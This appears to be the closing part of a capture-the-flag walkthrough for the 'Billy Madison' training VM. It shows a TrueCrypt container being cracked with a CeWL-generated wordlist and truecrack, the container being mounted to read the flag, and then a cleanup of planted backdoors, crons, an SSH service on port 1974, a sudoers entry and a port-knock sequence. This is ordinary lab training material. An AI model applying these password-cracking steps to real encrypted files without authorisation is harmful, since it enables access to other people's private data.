root@BM:~# ls -lah total 92K drwx------ 8 root root 4.0K Sep 15 11:02 . drwxr-xr-x 25 root root 4.0K Aug 30 01:15 .. -rw------- 1 root root 26 Sep 15 11:01 .bash_history -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc drwx------ 3 root root 4.0K Aug 11 22:30 .cache drwxr-xr-x 2 root root 4.0K Aug 22 21:24 checkban -rwxr-xr-x 1 root root 112 Aug 21 22:11 cleanup.sh -rwxr-xr-x 1 root root 59 Aug 21 22:12 ebd.sh -rw-r--r-- 1 root root 35 Aug 21 16:51 ebd.txt -rwxr-xr-x 1 root root 102 Aug 20 12:45 email.sh -rwxr-xr-x 1 root root 63 Aug 19 17:26 ftp.sh -rwxr-xr-x 1 root root 1020 Aug 20 14:00 fwconfig.sh drwx------ 2 root root 4.0K Aug 21 15:58 .gnupg drwxr-xr-x 3 root root 4.0K Aug 12 22:53 .m2 drwxr-xr-x 2 root root 4.0K Aug 11 22:17 .nano -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 66 Aug 15 10:16 .selected_editor drwxr-xr-x 2 root root 4.0K Aug 22 21:19 ssh -rwxr-xr-x 1 root root 33 Aug 11 22:51 ssh.sh -rwxr-xr-x 1 root root 69 Aug 15 20:54 startup.sh -rwxr-xr-x 1 root root 122 Aug 17 22:55 telnet.sh -rw-r--r-- 1 root root 222 Aug 20 21:58 .wget-hsts -rwxr-xr-x 1 root root 230 Aug 16 17:08 wp.sh
The shells here are partly legit and partly not and so it’s imperative to keep note of all the stuff Eric’s put in place.
In / we will find a folder called PRIVATE/
root@BM:/# ls -lah PRIVATE/ total 1.1M drwx------ 2 root root 4.0K Aug 29 09:58 . drwxr-xr-x 25 root root 4.0K Aug 30 01:15 .. -rw-rw-r-- 1 billy billy 1.0M Aug 21 16:42 BowelMovement -rw-r--r-- 1 root root 221 Aug 29 09:08 hint.txt
As is the case with almost anything I will find I take a copy locally to Kali and check the file.
file BowelMovement BowelMovement: data
BowelMovement looks like promising but is not human-readable, executable or a plain archive.
Let’s check out hint.txt
cat PRIVATE/hint.txt Heh, I called the file BowelMovement because it has the same initials as Billy Madison. That truely cracks me up! LOLOLOL! I always forget the password, but it's here: https://en.wikipedia.org/wiki/Billy_Madison -EG
Yeah – OK. So we have a password-protected file. I’m taking a shot across the bow with it beign a password-protected Office .doc/.docx, but no luck there. Hex Editor is no good here. So maybe it’s an encrypted volume. I’m guessing VeraCrypt/TrueCrypt. First I need a wordlist (spider with CeWL), then I can brute-force (truecrack) the file.
cewl --depth 0 -w billywiki.wls https://en.wikipedia.org/wiki/Billy_Madison CeWL 5.2 (Some Chaos) Robin Wood (firstname.lastname@example.org) (https://digi.ninja/)
truecrack -w billywiki.wls -t BowelMovement TrueCrack v3.0 Website: http://code.google.com/p/truecrack Contact us: email@example.com Found password: "execrable" Password length: "10" Total computations: "604"
Now that I know it’s encryption is TrueCrypt have the password I mount the file with veracrypt
veracrypt -tc BowelMovement crypt Enter password for /root/hacking/BM/loot/root/BowelMovement: Enter keyfile [none]: Protect hidden volume (if any)? (y=Yes/n=No) [No]: -ls 1 16 drwx------ 3 root root 16384 Dec 31 1969 . 65 1 -rwx------ 1 root root 1000 Aug 21 10:22 ./secret.zip 66 1 drwx------ 2 root root 512 Aug 21 10:39 ./$RECYCLE.BIN 68 1 -rwx------ 1 root root 129 Aug 21 10:39 ./$RECYCLE.BIN/desktop.ini
After you’ve unpacked the zip-file you’ll find 2 documents. One of which is Billy’s paper! Congrats! And a note “THE-END.txt”
cat THE-END.txt Congratulations! If you're reading this, you win! I hope you had fun. I had an absolute blast putting this together. I'd love to have your feedback on the box - or at least know you pwned it! Please feel free to shoot me a tweet or email (firstname.lastname@example.org) and let me know with the subject line: "Stop looking at me swan!" Thanks much, Brian Johnson 7 Minute Security www.7ms.us
And to top it off I will not have the internet go without this shining example of the intellectual prowess of Billy Madison.
Billy Madison Final Project Knibb High The Industrial Revolution The Industrial Revolution to me is just like a story I know called "The Puppy Who Lost His Way." The world was changing, and the puppy was getting... bigger. So, you see, the puppy was like industry. In that, they were both lost in the woods. And nobody, especially the little boy - "society" - knew where to find 'em. Except that the puppy was a dog. But the industry, my friends, that was a revolution. KNIBB HIGH FOOTBALL RULES!!!!! -BM
Cleaning up for Billy!
The objective stated that you have to undo the changes to recover Billy’s project. Having taken the more direct approach and having r00t I’ll just go ahead and remove Eric’s mess from this machine and leave it in a better state than I found it in. I’ll state here that I backed up everything on separate storage in case anything needs to be analysed/recovered.
# Ernie knows it!
It might not constitute a change by Eric. But the system has been compromised so it’s best to just reset all the passwords. Plus this will allow me to physically access the system
echo -e "NEWPASS\nNEWPASS" | passwd USERNAME"
# Get and remove elevation binary
root@BM:~# /usr/local/share/sgml# shred -zu donpcgd
# Check for crons and remove crons
root@BM:~# crontab -e */1 * * * * /root/ssh/canyoussh.sh */10 * * * * /root/telnet.sh */1 * * * * /root/checkban/checkban.sh root@BM:~# rm /etc/cron.hourly/pwn
# Find the backdoor
root@BM:~# netstat -tulpn | grep 1974
# Stop remove backdoor
root@BM:~# service sshd stop root@BM:~# update-rc.d -f sshd remove root@BM:~# rm /root/ssh/canyoussh.sh
# Stop ssh only if you have access via other means. I have reset the root password
root@BM:~# service ssh stop
# Remove Eric’s shells.
root@BM:~# rm /checkban/checkban.sh root@BM:~# rm ebd.sh root@BM:~# rm telnet.sh (funny telnet message for Billy) root@BM:~# nano startup.sh /root/telnet.sh &
# Back-up and remove defaced website, set root access read-only to be safe
root@BM:~# cp -r /var/www/html/ /var/www/html_old root@BM:~# rm -r /var/www/html/* root@BM:~# chmod 400 -R /var/www/html_old/ root@BM:~# ls -lah /var/www/ total 16K drwxr-xr-x 4 root root 4.0K Sep 29 19:24 . drwxr-xr-x 14 root root 4.0K Aug 11 20:58 .. drw-r-xr-x 10 root root 4.0K Sep 29 19:18 html dr-S--S--- 3 root root 4.0K Sep 29 19:20 html_old
# FTP knock should be changed
root@BM:~# nano /etc/knockd.conf [FTP] sequence = 43,1337,1776,1945,2001,2016
# Fuck Eric
root@BM:~# userdel eric
# Remove eric from sudoers
root@BM:~# nano /etc/sudoers #includedir /etc/sudoers.d eric ALL=(ALL) NOPASSWD:ALL
# Remove Eric’s SMB share
root@BM:~# nano /etc/samba/smb.conf [EricsSecretStuff] path = /home/WeaselLaugh guest ok = yes read only = yes writable = no public = yes
# Reboot to see how it comes back up
After the reboot I check if I can only ‘physically’ access the machine and none of Eric’s ‘services’ are running.
Discovered open port 80/tcp on 192.168.1.16 Discovered open port 445/tcp on 192.168.1.16 Discovered open port 139/tcp on 192.168.1.16
Looks good from the outside.
Time to chill. Thanks Brian for the lulz!
I set out to brush up my skills a bit and this was labelled with a difficulty of Beginner/Moderate.
As someone who is in that between I felt it was a perfect fit indeed helped me progress in what I can do and how I can go about it.
I did feel a bit iffy about leaving leaving the wordpress honeypot on there as it did not know if it belonged to Billy or Eric so I disabled it but left it were it was
Folders of interest: